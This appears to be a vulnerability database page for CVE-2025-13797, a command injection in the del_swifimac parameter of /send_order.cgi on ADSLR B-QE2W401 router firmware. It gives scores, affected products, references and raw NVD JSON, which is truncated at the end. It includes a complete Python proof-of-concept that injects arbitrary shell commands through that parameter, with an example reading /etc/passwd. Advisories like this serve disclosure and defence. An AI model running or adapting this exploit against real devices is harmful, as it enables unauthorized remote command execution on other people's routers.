CVE-2025-13797

Description

A vulnerability was detected in ADSLR B-QE2W401 250814-r037c. Affected by this issue is the function parameterdel_swifimac of the file /send_order.cgi. Performing manipulation of the argument del_swifimac results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:adslr:b-qe2w401_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:adslr:b-qe2w401:-:*:*:*:*:*:*:* - NOT VULNERABLE

ADSLR B-QE2W401 固件版本 250814-r037c

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13797 PoC - Command Injection in ADSLR B-QE2W401
# Affected endpoint: /send_order.cgi
# Vulnerable parameter: del_swifimac

def exploit(target_ip, target_port=80, command='id'):
    """
    Exploit command injection vulnerability in ADSLR B-QE2W401
    
    Args:
        target_ip: Target device IP address
        target_port: Target device web port (default: 80)
        command: Command to execute on the target system
    
    Returns:
        Response from the target device
    """
    url = f"http://{target_ip}:{target_port}/send_order.cgi"
    
    # Inject command through del_swifimac parameter
    # Using semicolon to chain commands
    payload = f"; {command}"
    
    data = {
        'del_swifimac': payload
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_13797_poc.py <target_ip> [command]")
        print("Example: python cve_2025_13797_poc.py 192.168.1.1 'cat /etc/passwd'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else 'id'
    
    print(f"[*] Targeting {target}")
    print(f"[*] Executing command: {cmd}")
    print("[*] Sending exploit request...")
    
    result = exploit(target, 80, cmd)
    print("\n[+] Response:")
    print(result)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13797
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13797
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13797/
[4] VulDB https://vuldb.com/cve/CVE-2025-13797
[5] https://vuldb.com/?ctiid.333808
[6] https://vuldb.com/?id.333808
[7] https://vuldb.com/?submit.691838
[8] https://www.notion.so/2a60c75766a88027a6aec07b378332a8
[9] https://www.notion.so/report-7-2a60c75766a88027a6aec07b378332a8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13797", "sourceIdentifier": "[email protected]", "published": "2025-12-01T01:16:00.147", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in ADSLR B-QE2W401 250814-r037c. Affected by this issue is the function parameterdel_swifimac of the file /send_order.cgi. Performing manipulation of the argument del_swifimac results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:adslr:b-qe2w401_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "250814-r037c", "matchCriteriaId": "CA4025DC-A438-47D8-8BCA-A72183CB0B08"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:adslr:b-qe2w401:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA9A0FCD-4ED6-45D3-AEB5-AB942DF93BE9"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.333808", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333808", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.691838", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.notion.so/2a60c75766a88027a6aec07b378332a8", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.notion.so/report-7-2a60c75766a88027a6 ... (truncated)